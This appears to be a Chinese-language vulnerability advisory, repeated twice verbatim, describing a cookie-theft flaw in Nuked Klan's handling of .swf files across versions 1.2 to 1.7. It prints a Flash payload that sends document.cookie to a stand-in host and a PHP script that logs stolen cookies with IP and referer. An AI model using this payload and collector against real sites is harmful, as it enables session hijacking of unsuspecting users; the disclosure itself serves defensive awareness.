VULHUB ™

Nuked Klan是一款基于ASP的WEB应用程序。 Nuked Klan处理.swf文件存在问题，远程攻击者可以利用漏洞获取其他目标用户的敏感COOKIE信息。 构建一个.swf文件，放置如下代码： getURL(&quot;javascript:alert('document.location=&quot;http://site.com/cookie.php? cookie=&quot;+document.cookie');&quot;); 或者 &lt;?php $cookie = $_GET['cookie']; $ip = getenv ('REMOTE_ADDR'); $date=date(&quot;m/d/Y g:i:s a&quot;); $referer=getenv ('HTTP_REFERER'); $fl = fopen('cookies.txt', 'a'); fwrite($fl, &quot;\n&quot;.$ip.' :: '.$date.&quot;\n&quot;.$referer.&quot; :: &quot;.$cookie.&quot;\n&quot;); fclose($fl); ?&gt; 当其他用户浏览器此文件时，可导致敏感COOKIE信息发送给攻击者。 Nuked-Klan Nuked-Klan 1.7 Nuked-Klan Nuked-Klan 1.5 SP2 Nuked-Klan Nuked-Klan 1.5 Nuked-Klan Nuked-Klan 1.4 Nuked-Klan Nuked-Klan 1.3 beta Nuked-Klan Nuked-Klan 1.3 Nuked-Klan Nuked-Klan 1.2 beta Nuked-Klan Nuked-Klan 1.2 目前没有解决方案提供： <a href="http://nk.gamez.solexine.fr/" target="_blank">http://nk.gamez.solexine.fr/</a>

Nuked Klan是一款基于ASP的WEB应用程序。 Nuked Klan处理.swf文件存在问题，远程攻击者可以利用漏洞获取其他目标用户的敏感COOKIE信息。 构建一个.swf文件，放置如下代码： getURL(&quot;javascript:alert('document.location=&quot;http://site.com/cookie.php? cookie=&quot;+document.cookie');&quot;); 或者 &lt;?php $cookie = $_GET['cookie']; $ip = getenv ('REMOTE_ADDR'); $date=date(&quot;m/d/Y g:i:s a&quot;); $referer=getenv ('HTTP_REFERER'); $fl = fopen('cookies.txt', 'a'); fwrite($fl, &quot;\n&quot;.$ip.' :: '.$date.&quot;\n&quot;.$referer.&quot; :: &quot;.$cookie.&quot;\n&quot;); fclose($fl); ?&gt; 当其他用户浏览器此文件时，可导致敏感COOKIE信息发送给攻击者。 Nuked-Klan Nuked-Klan 1.7 Nuked-Klan Nuked-Klan 1.5 SP2 Nuked-Klan Nuked-Klan 1.5 Nuked-Klan Nuked-Klan 1.4 Nuked-Klan Nuked-Klan 1.3 beta Nuked-Klan Nuked-Klan 1.3 Nuked-Klan Nuked-Klan 1.2 beta Nuked-Klan Nuked-Klan 1.2 目前没有解决方案提供： <a href="http://nk.gamez.solexine.fr/" target="_blank">http://nk.gamez.solexine.fr/</a>